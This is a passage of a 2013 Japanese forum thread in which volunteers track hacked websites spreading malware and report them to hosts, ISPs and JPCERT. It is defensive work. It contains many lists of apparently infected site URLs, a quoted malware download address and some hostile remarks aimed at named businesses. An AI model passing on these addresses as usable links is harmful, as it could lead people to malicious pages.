210 : ベターまたはベストに近いロータリー 国際ロータリー第2830地区 WEBサイト不正改ざんの概要及びサーバー復旧のご報告.pdf https://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609houkoku%2Epdf http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609houkoku%2Epdf 不正アクセスによる各クラブの被害状況(詳細).pdf - 国際ロータリー第2830地区 「レンタルサーバー(rotary-aomori.org)への不正アクセスによるデータ改ざん等の被害状況」 https://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609list%2Epdf http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fwww%2Erotary%2Daomori%2Eorg%2F2012%2FPDF%2F20130609list%2Epdf サーバーの複数管理による改竄被害は不可避に近い状況なぬで、バッサリした判断・対応は賞賛に値すると漏れは思ふ。
211 : 書き忘れ >>207-208 対応済み お疲れ様です。>鯖管様
212 : www●gakysyuu●jp/hutyuu●html ぐぐるが警告してるが私には分からないのでm(__)m
213 : (2013/07/10 9:40), JPCERT/CC wrote: > --------- This is an automatic email from JPCERT/CC. --------- > > We would like to acknowledge the receipt of your incident report. > > Your incident report will be handled based on our policy. In certain > situations, we may forward your report to the corresponding > person/parties in a coordinated manner. Please promptly inform us if > you do not wish to have your report forwarded. > > If you are not the appropriate person to receive this email, please > disregard this message. > > Please feel free to contact us for further questions or comments. > > Best regards, >>192 403 昨日、別件で#0c0896を確認 ↑は検体送付の受理返信。一部詳細はさいとあどばいざに http://megalodon.jp/2013-0709-2158-26/online.drweb.com/result/?url=http%3A%2F%2Frockbook01%2Eawe%2Ejp%2Fdekome%2Findex%2Ehtml やったこと、ばりゅどめと親会社のGMOにつーほ >>212 こちらの環境ではわからなかったん くいんしーじょーんずぁゃゃにちかまつもんざぇもんでどぞー はっぽーしゅうんめぇ
214 : Web閲覧でのマルウェア検知が日本で急増、カスペルスキーが注意喚起 www.itmedia.co.jp/enterprise/articles/1307/05/news082.html >7月1日以降は減少している とりあえず収束かな 二ヶ月くらいはのんびり出来るかな
215 : www1●ocn●ne●jp/~aoyamaco/ www1●ocn●ne●jp/~blitz/ www1●ocn●ne●jp/~satou●mc/ www1●ocn●ne●jp/~tei-teru/ www10●ocn●ne●jp/~kerotyan/ www10●ocn●ne●jp/~win-now/
216 : 1ヶ月の第1週に改竄のピークが有り、100サイト位は毎日改竄されているような 状況なので、減ったなんて言えないのではないかな。
217 : www12●ocn●ne●jp/~act53/ www15●ocn●ne●jp/~asla/ www16●ocn●ne●jp/~kaigo-ok/ www2●ocn●ne●jp/~mi-yoshi/ www3●ocn●ne●jp/~kougetsu/ www3●ocn●ne●jp/~nml/
218 : >>216 ガ━━━━━━(゚д゚lll)━━━━━━ン
219 : www4●ocn●ne●jp/~a-6118/ www5●ocn●ne●jp/~camel/ www5●ocn●ne●jp/~kcoreyge/ www5●ocn●ne●jp/~zaitack/ www6●ocn●ne●jp/~kmkk/ www6●ocn●ne●jp/~onodensh/ www7●ocn●ne●jp/~ecoromy/ www8●ocn●ne●jp/~dutchrek/ www8●ocn●ne●jp/~ruah/ ds-sinjo●co●jp www●raisu●co●jp tt-ins●co●jp/
220 : >>215 ocnフォーム発射完了 >>217 ocnフォーム発射完了 >>219 @-HJK ocnフォーム発射完了 >>219 I どうしましょうね 明日考えますね
221 : >>219 I ocnフォーム発射完了&対応出来るのかを確認中 更に、ドコモからショップへ連絡の段取り完了
222 : >>221 ocnセキュリティから回答あり ocnフォームでは受けられないもより 別経由でverio の窓口を聞き出しました inquiries@verio.jp 力尽きたので放置 ドコモ神奈川総務さん、がんばって 使用ブラウザがwindwsと言い張るドコモショップ新城店の相手は私には無理
223 : っ https://www.virustotal.com/en/ip-address/204.227.180.5/information/
224 : >>222 担当窓口はso-net法人向け窓口 当該ドメインはメールサーバーのもので作ったのはソネット、とDSは主張しています 昨日、DSサイドからソネットに問い合わせしたところ 改ざんはなく問題ないと回答したとのこと… と、DSは主張しています 私がソネットに問い合わせしたところ、会員以外の問い合わせには応じられないと電話を切られました(笑 ウイルスに感染したとしても責任は取らないそうです 月曜以降に別の窓口に問い合わせする予定です 余談ですが、改ざんコードが 難読が解かれた不正な iframe に変更されてます Kaspersky で検出できる様なのでDSにカスペルスキーを導入して貰うのも有りかと
225 : www12●ocn●ne●jp/~dz577-91/ www13●ocn●ne●jp/~smile-cd/ www3●ocn●ne●jp/~nml/ www3●ocn●ne●jp/~skk-west/
226 : >>225 @A ocnフォーム発射完了 B → >>217 E リベンジ ocnフォーム発射完了 C対応されてるもより
227 : >>223 (2013/07/13 0:15), > Greetings from the NTT Communications Global IP Network Security Team, > > This is an automated reply to inform you that we have received your e-mail > regarding an alleged violation of our Acceptable Use Policy by a customer > of NTT Communications. > > If your issue involves unsolicited commercial e-mail, please reply to us > with the entire unsolicited e-mail with complete headers if you have not > already done so. Please limit your e-mail to essential information that > would help us with investigating the incident. Personal commentary may > delay the processing of your request. > > Please be advised that we can only address abuse issues regarding NTT > Communications customers. Spam and/or abuse issues involving non-NTT > Communications customers need to be reported to the Abuse address of the > originating domain or service provider for proper handling and disposition. > Please be aware that it is common for spam and Usenet abuse to be generated > with false or manipulated return addresses, thus the issue may not involve > NTT Communications or its customers. Please look at the full header > information, including the received lines, to determine the true origin of > the e-mail. For Usenet, you can use the 'NNTP posting host' IP address or > hostname. > > We appreciate the time you have taken to report the alleged abuse, however > due to the volume of e-mails we receive, we are not able to respond > personally to each complaint received. [省略] ntt.netのabuseからは自動返信きてた >>225-226 お疲れ様です。
228 : memo>>223 http://megalodon.jp/2013-0713-1602-32/online.drweb.com/result/?url=http%3A%2F%2Fds%2Dsinjo%2Eco%2Ejp%2F http://megalodon.jp/2013-0713-1603-34/online.drweb.com/result/?url=http%3A%2F%2Fds%2Dsinjo%2Eco%2Ejp%2Findex%2Ehtml http://megalodon.jp/2013-0713-1604-21/online.drweb.com/result/?url=http%3A%2F%2F204%2E227%2E180%2E5%2F http://megalodon.jp/2013-0713-1605-06/online.drweb.com/result/?url=http%3A%2F%2F204%2E227%2E180%2E5%2Findex%2Ehtml > infected with JS.IFrame.425 http://megalodon.jp/2013-0713-1325-49/https://www.virustotal.com:443/en/ip-address/204.227.180.5/information/ http://megalodon.jp/2013-0713-1622-32/https://www.virustotal.com:443/en/domain/ds-sinjo.co.jp/information/ https://www.virustotal.com/en/url/f6d10cdb3b54a5c49da2ee9fc446063561abb2924ddf7c0f9d4be75d656e514e/analysis/1373688884/ https://www.virustotal.com/en/url/4c905e198445135d490073ebeea523832e38aedc52631c1a6c9b011a11a9a4a8/analysis/1373688760/ https://www.virustotal.com/en/url/20411b453b7e8687afb5252dbc7b38d60345558518fb2c1cf95c6149b4571578/analysis/1373691510/ https://www.virustotal.com/en/url/e7843e3e8c2b49a935feffa309b442fc972a9265dda47d8ad6aa85c83bc167a8/analysis/1373691510/ https://www.virustotal.com/en/file/c70b6b722553beb6156aa57c9a58169fc2ebb4bc18f1b4c8c70732399a9885a9/analysis/1373689116/
229 : sinei-kitchen●com/ kyoei-medical-o2●co●jp fruits-lunch●com/ aomoriya●jp/basic●js www12●big●or●jp/~zero-one/ www2●big●or●jp/~zero-one/ www22●big●or●jp/~zero-one/
230 : >>229 @AB FirstServer正規フロー窓口↓ supportorder.fsv.jp/form/toiawase_input.aspx ← フォームから対応されるかtest フォーム発射完了 CDEF 月曜以降に正規フローを確認した後に(お盆なので時間が掛かるかも)
231 : >>203 ,214 追加 www.npa.go.jp/cyberpolice/detect/pdf/20130626.pdf winXPは更新しても脆弱性は解消されない方向にあるんじゃなかろうかと思われるのですが 警察庁は低能集団ですかw
232 : >>231 OSかえろってのは経済的な問題も出てくるので残念ながら非現実的 ユーザーが自力で持続可能な範囲で基本的な対応を促すしかないんじゃないかと 知り合いに対してでもいきなりPC変えろとは言い難いし
233 : >>232 ・個人が趣味でホームページをもっている場合、趣味であるならお金は惜しまないはず ・企業である場合、企業なら金は惜しむべきではないでしょう 新しいOSの乗ったPC5万有れば買えます 分割でもいいでしょう ホームページを持たずに趣味でPCを使っているだけならいざしらず 不特定多数が閲覧するホームページを所有するなら必要不可欠な出費であると覚悟するべきでしょ
234 : >>233 >>231 のは閲覧側の注意喚起じゃん
235 : >>234 web改ざんされないための注意喚起でもあります
236 : サイト所有者が>>231 を真に受け「最新の状態に更新してるからおkじゃん」と錯誤させることが問題なのです
237 : n-sagami●com/ryoko/ryoko1●html sanyogiken-gp●co●jp/ nature-nail●com/ m-filled●com/
238 : >>237 ocnフォーム発射完了
239 : ここも全く対応しない aiweb●or●jp/nagoya-handbag/
240 : インターネット三重 プロバイダが感染! 三重に感染が多いのはこういうところが感染しているからなのでしょう inetmie.or.jp/
241 : >>239 ocnフォーム発射完了 >>240 明日以降
242 : お疲れ様です。 240 Lynxでフォームからつーほーしてみました。 文字入力数の限界ぽかった saitoadobaizanimokisaisuta
243 : atene●co●jp/ eishin-maoyi●co●jp/ esn●co●jp/
244 : Redkit により Web で赤信号が点灯 | Symantec Connect コミュニティ http://www.symantec.com/connect/ja/blogs/redkit-web
245 : >>243 お疲れ様です 上下 https://cgi01.ocn.ne.jp/support/abuse/blog.html 中 viaVerio Customer Service >222 inquiries@verio.jp つーほーすますた saitoadobaizanobaguyaro 検体どーすべ
246 : >>243 ,245 乙ですー んでAのネームサーバ www.secure.net/? が siteadvisorがレッド& not found ですが何かあったのでしょうか(棒
247 : 詳細とかさっぱりなんですが、ぐぐるとこんなのが BKDR_BIFROSE.FUU | 危険度: 低 | トレンドマイクロ:セキュリティ情報 http://about-threats.trendmicro.com/Malware.aspx?id=47811&name=BKDR_BIFROSE.FUU&language=jp > ダウンロード活動 > マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。 > ・ http://{BLOCKED}secure.net/ABIUSP/setup.exe サブドメインだったのかな?
248 : >>242 進捗状況 http://megalodon.jp/2013-0714-2246-24/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/ http://megalodon.jp/2013-0715-0145-15/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/ http://megalodon.jp/2013-0715-0941-35/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/ http://megalodon.jp/2013-0715-1607-48/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/ http://megalodon.jp/2013-0715-2241-04/https://www.virustotal.com:443/en/ip-address/61.114.231.60/information/
249 : >>242 完了
250 : 大阪府文化財センターのページやられてるのにまだ改善なしか?
251 : >>250 大阪府文化財センターの公式サイトにバイ@グラの隠し宣伝リンクがっ! - 無題な濃いログ - Yahoo!ジオシティーズ http://geocities.yahoo.co.jp/gl/gbmogiki/view/20130715/1373872947 0day.jp (ゼロデイ.JP): #OCJP-109:RedKit転送仕組みにやられた国内のサイト http://unixfreaxjp.blogspot.jp/2013/07/ocjp-109redkit.html こんなの http://wepawet.cs.ucsb.edu/view.php?hash=ea87827ea1f4ace820cb839bd0d20cb7&t=1373783744&type=js http://wepawet.cs.ucsb.edu/view.php?hash=45b6a121d0f67e3503e07dbe12dfdbe8&t=1373785897&type=js http://kohada.2ch.net/test/read.cgi/sec/1369932406/177 ウィルス撒布者[occh-i]に告ぐ http://homepage2.nifty.com/HAYAKASA/tawake.html 南河内考古学研究所 情報掲示板 -考古学関連の情報・博物館展示情報・図書刊行情報など- http://www.skao.net/arcbbs/minibbs.cgi?ff=38887&cmd=rm pc1.occh-unet.ocn.ne.jp (当時) 絶句 情報セキュリティ・個人情報保護 ブログ: パソコンソフトの違法コピーは絶対ダメ! http://www.azport.jp/weblog/2009/03/post_180.html
252 : >>251 http://namidame.2ch.net/test/read.cgi/news/1208918626/ http://academy6.2ch.net/test/read.cgi/archeology/1234569515/
253 : >>240 forbidden(403)になってます 昼間電話したのですが、すでに把握していました
254 : 残権は以下だけでいいかな? >>219 I >>230 CDEF
255 : >>254 >>219 Iドコモの偉いひとに協力要請 >>230 Cわからない DEF403
256 : >>229 の4は8080系で古そうに感じたけど本当に古いのかもしれない Last-Modified: Thu, 24 Jun 2010 05:44:22 GMT レンタル元に確認してみる
257 : >>219 I 対応した模様
258 : txtどこー? IPA 独立行政法人 情報処理推進機構:2013年7月の呼びかけ Last-Modified: Mon, 08 Jul 2013 09:53:17 GMT : http://www.ipa.go.jp/security/txt/2013/07outline.html > 更新履歴 > 2013年 7月 8日 「(2)改ざん有無の確認方法」を「(2)ウェブ改ざんへの対策」へ修正 > 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正 > 2013年 7月 5日 「(3)ウェブ改ざんの被害発生時の対処」内のセキュリティ関連の組織や企業が提供している、無料でウイルスチェックができるウェブサイトへのリンクを修正 > 2013年 7月 1日 掲載
259 : >>229 の4 レンタル元より返信 サイト管理者への連絡および該当サイトを停止 401になってるね レンタル元さんの問い合わせフォームから連絡し対応してもらいました http://www.future-s.com/contact/index.html
260 : >>259 乙ですー
261 : >>250 たった今、ラジオニュースで謝罪してるとやってた。 通報したみなさん乙です。
262 : 大阪府文化財センターに凸して聞いてみました 委託業者は、サン・ネットワークスとのこと サン・ネットワークスが具体的にどこなのかは分かりませんがw www.siteadvisor.com/sites/http%3A//www.sunnetworks.jp/ イエロー判定カワウソw
263 : AVG2013インターネットセキュリティ使ってますが踏む勇気が出ない・・・・
264 : 【LINE】「NAVERまとめ」などに不正アクセス、169万件のID流出ニダ━━━<丶`∀´>━━━━!!!! hayabusa3.2ch.net/test/read.cgi/news/1374231868/ 【緊急】LINEで有名なNAVERの個人情報流出 アカウント名・パスワードなどが漏れる engawa.2ch.net/test/read.cgi/poverty/1374227937/ ネバよ!お前もか!注意せネバネバ
265 : nature-nail●com/ ohuk●jp/ tb9●jp/js/jquery●fademover●js www●esn●co●jp/ www●kk-nishimaki●co●jp/newshop/event/springfare●html www7●ocn●ne●jp/~gbusters
266 : >>265 @ → >>237 B ocnフォーム発射完了 ABocnフォーム発射完了 C → >>166 @,>>243 B ocnフォーム発射完了 DEocnフォーム発射完了
267 : >>265-266 お疲れ様ですお疲れ様です。 >>261 いや、まだ懸念材料が(ry 今、完全閉鎖の要望をめるすたん >>262 げげーん
268 : げはしくねもい よくよく検索し直したら18金げむのさいとの跡地のようだたー@さいとあどばいざ
269 : >>237 C m-filled●com/ 対応されていないので電話してみました 業者には対応するよう依頼しているそうですが、何て言うのか(ry さて、金銭を要求し対応してあげるという電話があったそうですが 私達のスキルはお金を払って習得したものではなく 善意の方が無償で公開&授けてくれたものです もしかしたら、お亡くなりになった方もいるかもしれません 私達は力を託されたのです 全てを一人の力でやっているのではありませんよ 身に覚えのある香具師さん 調子こいてると追い込み掛けますよw
270 : > 金銭を要求 ぽかーん >>268 エロゲ追加 見つけてしまう漏れのスキル(?)にカンパイ
271 : belleohtsu●co●jp featurepics.promos●co●jp ident-prex●co●jp
272 : 申告しても対応しないサイト colx●co●jp bio-pf●co●jp kyuhaisui●jp/ nanautsuki●lals-inc●com/ invoke●co●jp arow●co●jp humans●co●jp nom-osaka138●co●jp p-web●co●jp miura-sports●com beridansu●catch-the-future●com/cat130/ netjohono1●com/ takarakuji-ataru●com/ e-ibh●com/ coach-take●com/ www●green-w●co●jp/ www●koubegyuu●com/about●html miidayori●xmiix●com/
273 : >>271 ,272 全部GMOなんですね… GMOは嫌いです とりあえず、>>272 M e-ibh●com/ 営業していたので電話しました 一応現状404になりましたが… 四次元の住人と話をしている様で むかつきましたね
274 : >>272 K 対応済なんじゃないのかな
275 : www.npa.go.jp/cyberpolice/detect/ www.npa.go.jp/cyberpolice/detect/pdf/20130607.pdf ↑ こんなものね、誰も見ないと思うんですね なので、直接全ISPに注意喚起の連絡を直接警察庁からした上で 更にプロバイダからユーザに対して注意喚起をして貰う様 警察庁に要請してみました 朝日ネットはやったそうなので出来るはず so-netの件も伝えました もうね、手に負えなくなる悪寒がするねんw
276 : >>271 ,272 正規フローなのかは不明ですが 一応↓からフォーム発射完了 secure.gmo.jp/contact/
277 : >>275 お疲れ様です > 注意喚起 Domain登録業者にも通達してそのユーザー向けにもしてほすぃ 鯖が海外業者だとちょいメンドイ Domain登録業、代行業は我関せずの姿勢が多いのは間違ってる あと上流のISPの中にも下流に関して手を触れないのがあるのは困りもの 危険なサイトなのでつーほーめるそのものがフィルタリングされちゃうんだから 受け取ったら責任を持って下流にも伝えるべっきー >>276 お疲れ様ですお疲れ様です
278 : にゃんと…… http://kohada.2ch.net/test/read.cgi/sec/1370942055/47 からん OCN 400万人の会員情報流出か http://hayabusa3.2ch.net/test/read.cgi/news/1374671659/ http://www3.nhk.or.jp/news/html/20130724/k10013271121000.html 【速報】「OCN ID」に不正アクセス 最大で約400万人のメールアドレスとパスワード盗難か http://hayabusa3.2ch.net/test/read.cgi/news/1374671630/ http://news.livedoor.com/article/detail/7890046/ OCN IDサーバーへ外部から不正アクセス 最大400万のIDと暗号化パスの流出の可能性 http://engawa.2ch.net/test/read.cgi/poverty/1374663426/ http://www.ntt.com/release/monthNEWS/detail/20130724.html
279 : イベントセミナー情報 緊急開催!【開催日時】2013/08/06 14:30〜16:00(受付開始14:15) jp.trendmicro.com/jp/events/detail/20130717001103.html 「90分でわかる、多発するWeb改ざん事件と、なりすまし不正ログイン、 脆弱性悪用による情報漏えい事件の解説と対策」
280 : IPA 独立行政法人 情報処理推進機構:2013年8月の呼びかけ http://www.ipa.go.jp/security/txt/2013/08outline.html
281 : CMSの脆弱性を悪用するスパムボット「Stealrat」による感染を確認するには? | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog) http://blog.trendmicro.co.jp/archives/7662
282 : GMOもだめですねー bio-pf●co●jp kyuhaisui●jp/ humans●co●jp 配下のページ p-web●co●jp takarakuji-ataru●com/ coach-take●com/
283 : お疲れ様です >>282 一番二番発射 くこでリタイヤ m(_ _)m ι(´Д`υ)アツィー
284 : 何度申告しても対処しないサイト crystalj●co●jp/ canonet n-washington●co●jp/ canonet pazuru●co●jp/ canonet saitokoumuten●co●jp/ canonet officekens●co●jp/ CPI nakamura-kogyo●co●jp/ CSIDENET belleohtsu●co●jp/ GMO chemi-cal●co●jp/ GMO generic-shinnei●co●jp/ GMO jamsoftware●co●jp/ GMO ayabekikou●co●jp/ NTTPC popup●co●jp/ NTT-PC fujiken2464●co●jp/ OCN gysekkei●co●jp/ ride
285 : neurosystem●co●jp/kozukai/ sakura life-ac●co●jp/ smileserver issaku●co●jp/zen_issaku/shinosaka/ vectant foods-dream●co●jp/ Verio eight-s●co●jp/ デジロック nabeya-zakka●co●jp/file/slideshow/ ファーストサーバー ishiko●co●jp/ 大塚商会 ishitabi●co●jp/ 大塚商会
286 : >>282 @ bio-pf●co●jp >>272 A A kyuhaisui●jp/ >>272 B B humans●co●jp 配下のページ >>272 F C p-web●co●jp >>272 H D takarakuji-ataru●com/ >>272 L E coach-take●com/ >>272 N >>283 乙ですー GMOからのメールによれば現在進行形であり対応完了してはいない旨の認識はあるようなので生温かく見守ってあげてください >>284 @鯖が見つかりません(対応済のもより) A休日のもよりなので営業日に凸予定 B現在凸中
287 : CANONET は8/10〜8/18までお休みなのでw >>284 Dofficekens●co●jp/ >KEN'Sは、業務サポート専門会社です 笑わせるんじゃありませんよ 把握してるから、対応中だから何だというのでしょうね 偉そうな物言いや電話を切るような輩はクタバレばいいと思いますね 本当に対応してるなら、そんなもの3秒で完了するっしょw
288 : お盆が明けるまでは打つ手がないもよりですが この状況でどうするかを思案するのもまた一興w
289 : ググって踏んでも真っ白だったり開かないのはこれのせいだったのか
290 : >>285 Alife-ac●co●jp/ 所有会社に連絡 いい感じでした
291 : >>284-285 【努力】の「ど」作戦終了 明日からゆるゆると& お盆明け以降は通常フローでガンガル >>286 の>>284 Bpazuru●co●jp/ 情報だけ貰って閉鎖をしておきながら 当店は元々HPを持ってないとぶっこきくさって 更に警察に通報しくさった馬鹿女&店長 お前達には天罰が下るはず…といっておきますよんw
292 : >>291 間違えたので訂正です >>286 の>>284 Bpazuru●co●jp/ ← 間違えたので訂正し謝罪いたします >>285 Enabeya-zakka●co●jp/file/slideshow/ ← こっちでした
293 : 疲れてるなら休もうそうしよう
294 : 自分は大体レンタル元に直接連絡するわ サイト管理者で対応できる人もいるけどそうじゃない場合非常にめんどいし レンタル元なら安全第一でサイト停止等の行動をしてくれる レンタル元がダメなときはJPCERTに投げちゃう
295 : d
296 : っ http://megalodon.jp/2013-0811-0227-19/https://www.virustotal.com:443/en/ip-address/164.46.131.23/information/ とりあえず雲で有名になったとことかにメル発射 ( ゚Д゚) ネムヒー saitoadobaizanobaguyaroooooooooo > ERROR:変なホスト規制中! ><;
297 : ▼GMO CLOUD www●tokyo-suidouya●jp/ zero-edit●com/ ips●vc/ kyuhaisui●jp/ belleohtsu●co●jp/ bio-pf●co●jp
298 : >>269 いまだに2ちゃんで「香具師」という言葉を使っている 原始人みたいな人もいるんだなw
299 : >>297 お盆明け以降に >>285 Enabeya-zakka●co●jp/file/slideshow/ 証拠隠滅したつもりのなべやさん 当店は元々HPを持ってないと主張したなべやさん ↓これはなんでしょw http://www.aguse.jp/?url=http://www.nabeya-zakka.co.jp/mob.htm www●nabeya-zakka●co●jp/i/index●htm >>298 ヤホー(^0^)/
300 : なべやさん お前達が頼みの綱の中原警察は、今日乗り込んで完全にしめてきましたよんw
301 : ファイルは昼頃404になったん>>296 この頃は正常だったみたい http://ikura.2ch.net/test/read.cgi/jfoods/1070740162/68 >>299-300 お疲れ様です
302 : いろいろと腹の立つことや納得できないこともありますが 修正されたり閉鎖されたりすることは、対応完了であり 勝利… なのではありまっするまっするw
303 : 神奈川県警なのが不安要素
304 : フロリダ州の退役軍人のサイトが盛大にやられてるん 正常 ソース http://megalodon.jp/2013-0815-2338-34/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217 http://megalodon.jp/2013-0815-2355-26/rd.or.tl/get.php?site=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217&act=view スクショ http://megalodon.jp/2013-0815-2345-02/gw.aguse.jp/?aguse_url=http%3A%2F%2Ffloridavets.org%2F%3Fpage_id%3D217 ぁぅぁぅ ソース http://megalodon.jp/2013-0815-2340-40/rd.or.tl/get.php?site=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217&act=view&ua-freetext=google&ua=textbox スクショ http://megalodon.jp/2013-0815-2343-13/gw.aguse.jp/?aguse_url=http%3A%2F%2Fwww%2Egoogle%2Eco%2Ejp%2Fgwt%2Fn%3Fu%3Dhttp%253A%252F%252Ffloridavets%252Eorg%252F%253Fpage%255Fid%253D217 google…… 恐ろしい子。
305 : みんなどうやって改竄されてるサイトを見つけてくることができるんだ? 俺ができる対策はテンプレとUrl.Voidやvirus totalで調べることくらいだけど
306 : さて、どうしたものか。 DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMDgxNi0yMzI3LTAxL2d3LmFndXNlLmpwLz9hZ3Vz ZV91cmw9aHR0cCUzQSUyRiUyRnd3dyUyRXNpdGVhZHZpc29yJTJFY29tJTJGc2l0ZXMlMkZodHRw JTI1M0ElMjUyRiUyNTJGaWNoaWd1JTI1MkVtZW1vcGFkJTI1MkVvcmclMjUyRmluZGV4JTI1MkVo dG0NCg== >>305 ぐぐる
307 : >>306 ぐぐるって まじでそんだけ? まあ確かにグーグル先生は定評あるけど
308 : 以前はやほーさーちがダントツだった。 余りにも高性能すぎて、使うのに躊躇すたん。 今は孫やほーはぐぐる、本国※やほーはびーいんぐになったけど それぞれ元となった検索サービスにはあったせーふぶらうじんぐ(警告)が無くて一般人が使うには(ry ぐぐる > このサイトはコンピュータに損害を与える可能性があります。 びーいんぐ > コンピューターに被害を与えるおそれのある、悪意のあるソフトウェアがダウンロードされる可能性があるため、このサイトへのリンクが無効になりました。
309 : あと、このスレ1から読むとそのものずばりのがあるよん 200レスぐらい読もー
310 : NTTPC jisyubo●co●jp/ sign-s●co●jp/ stork●co●jp/t_sakuraba/album/ tokiwakaigo●co●jp/ vtc●co●jp/seminer/china_tettai/
311 : >>305 鑑定関連スレが2chにはいくつかあるが そこに張り付いているとたま〜にだけど新種にやられたサイトに出会える
312 : グーグルさんは確かに危険サイトに良く反応するけど 脅威がないサイトも良く検出する(いわゆる誤反応)
313 : ▼canonet shinko-engineer●co●jp/ shouwa-lab●co●jp/ straightword●co●jp/ ▼CPI re-media●co●jp/user/trust_onoda/ seiwa-trading●co●jp/ stylecars●co●jp/ ▼GMO hinokilab●co●jp/ ten-on●co●jp/ wakana-fc●co●jp/
314 : ▼GMOcloud ach●co●jp/ shin-ei-net●co●jp/ 配下のページ全て sigakuin●co●jp/ 配下のページ全て wakaki●co●jp/ ▼inforyoma www●e-tokushima●co●jp/vw/ 配下のページ ▼Joe'sウェブホスティング www●abe-auto●co●jp/ www●aizen-p●co●jp/recruit/ wingfoot●co●jp/ 配下のページ全て takarabe-hrj●co●jp/clock/ takarabe-hrj●co●jp/images/ sunfoods-o●co●jp/
315 : ▼LOLIPOP negizen●co●jp/ shintendo●co●jp/ ▼Nifty fujii-kensetsu●co●jp/ ▼vectant issaku●co●jp/zen_issaku/shinosaka/
316 : ▼canonet >>284 @ABC >>313 @AB 0367327573に連絡(すでに対応済のところもありましたが) メアドを聞き出しました support@canonet.ne.jp 今回はjpサート経由で既に連絡があったそうです jpサートに連絡した方乙です 多分他のところにも連絡したんじゃないのかなと思われるので 他の残権は連絡済とみなし様子見とします
317 : お疲れ様です。 >>168 ,181,183-184,306 JPCERT : CodeName : COLOR #d68107 Wepawet http://wepawet.cs.ucsb.edu/view.php?hash=73bd268a264f33a9b9e1d2329195b598&t=1376999711&type=js urlQuery http://urlquery.net/report.php?id=4640111 aguseGATEWAY http://megalodon.jp/2013-0820-2114-56/gw.aguse.jp/?aguse_url=http%3A%2F%2Fichigu%2Ememopad%2Eorg%2Findex%2Ehtm VIRUSTOTAL https://www.virustotal.com/en/url/e2c1f014719be0ac0e95afe7c61e657e68fc4aa7766c7f85c938efe587617f6d/analysis/1377001053/ Detection ratio: 10 / 39 Analysis date: 2013-08-20 12:17:33 UTC Additional information last-modified: Mon, 19 Aug 2013 10:07:53 GMT Response content SHA-256 ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058 https://www.virustotal.com/en/file/ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058/analysis/1377001013/ SHA256: ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058 SHA1: 0d51cc0372565fb485f832439595f9117b4ddd46 MD5: 8b28c0e8d3da4893926a0796e6e946ec File size: 13.1 KB ( 13436 bytes ) File name: index.htm File type: HTML Detection ratio: 7 / 45 Analysis date: 2013-08-20 12:16:53 UTC 検体送付かんりょ さいとあどばいざはまだだお 「d68107」は初見? https://twitter.com/jpcert_ac/status/345343485387345920 https://pbs.twimg.com/media/BMroEfxCEAID-K-.png
318 : 情報搾取を狙う「Web改ざん+不正ログイン+詐欺」の連鎖攻撃が顕著に-2013年08月19日 http://www.itmedia.co.jp/enterprise/articles/1308/19/news105.html >>314 Dwww●e-tokushima●co●jp/vw/に何気に聞いてみたのですが OS:Windows 7 ソフトウェア;最新に更新 セキュリティソフト:ウイルスバスター(最新に更新) さて、この環境で何故web改ざんされるのでしょうね 警視庁サイバー犯罪対策課に>>314 Dに事実確認をした上で トレンドマイクロに対して、さりげなく詰問するよう要請しておきましたw
319 : てすと
320 : めも http://www.landerblue.co.jp/blog/?p=8402 http://ja.forums.wordpress.org/topic/24503 http://ja.forums.wordpress.org/topic/24503/page/2 これ関係か >>16 共有鯖の場合CMSのバージョン上げても、同居人がバージョン上げてなかったら改竄被害に巻き込まれてしまうでFA?
321 : >>320 当社サービス「ロリポップ!レンタルサーバー」ユーザーサイトへの第三者による大規模攻撃について / 新着情報 / お知らせ - レンタルサーバーならロリポップ! http://lolipop.jp/info/news/4149/
322 : memo http://kohada.2ch.net/test/read.cgi/sec/1279428532/711
323 : 復帰カキコ
324 : ロリポップ!への大規模攻撃 〜 そういやPHPでtelnetモドキやるプログラムがあってね 〜 http://kohada.2ch.net/test/read.cgi/pcnews/1377980797/ 【チカッパ】ロリポップ (lolipop)41【プラン追加】 http://toro.2ch.net/test/read.cgi/hosting/1377869840/
325 : ウイルス撒き散らしているとこ以外にも、偽造医薬品販売の踏み台になっているとこが多いの 日本共産党柏原市会議員団 http://www.siteadvisor.com/sites/msgpage/%6a%63%70%2d%6b%61%73%69%77%61%72%61%2e%6f%72%67 三度目のつーほーすた 今回もスルーなぬかようか >>324 オツデス こりは……
326 : >>325 http://search.yahoo.co.jp/search?n=100&dups=1&p=site%3Ajcp%2Dkasiwara%2Eorg%20%22jcp%2Dkasiwara%2Eorg%2Fimg%22 http://search.yahoo.co.jp/search?n=100&dups=1&p=%2Dsite%3Ajcp%2Dkasiwara%2Eorg%20%22http%3A%2F%2Fjcp%2Dkasiwara%2Eorg%2Fimg%22
327 : つーほーしたのは404だけど直ってなかた。。。orz......... >>325
328 : www1●ocn●ne●jp/~animal30/ www1●ocn●ne●jp/~kandn/ www3●ocn●ne●jp/~orange_t/ www4●ocn●ne●jp/~kyowa●k/ www6●ocn●ne●jp/~morizen/ www8●ocn●ne●jp/~chateau/ www8●ocn●ne●jp/~b-jack/ iidazeirishikai●jp/ whitecube●org/ fujinosato●co●jp/ amakusa-princehotel●jp/ loftjazz●jp/ 60●43●234●181/
